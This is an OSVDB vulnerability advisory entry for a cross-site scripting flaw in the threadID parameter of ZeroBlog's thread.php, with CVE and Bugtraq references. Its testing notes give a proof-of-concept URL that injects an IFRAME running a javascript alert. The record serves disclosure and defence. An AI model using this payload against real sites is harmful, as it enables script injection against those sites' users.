ZeroBlog thread.php threadID Variable XSS

2005-10-11T08:19:48
ID OSVDB:19908
Type osvdb
Reporter OSVDB
Modified 2005-10-11T08:19:48

Description

Manual Testing Notes

http://[target]/thread.php?threadID='%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E

References:

Vendor URL: http://www.sothq.net Secunia Advisory ID:17175 Other Advisory URL: http://irannetjob.com/content/view/141/28/ Mail List Post: http://archives.neohapsis.com:80/archives/bugtraq/2005-10/0115.html CVE-2005-3264 Bugtraq ID: 15078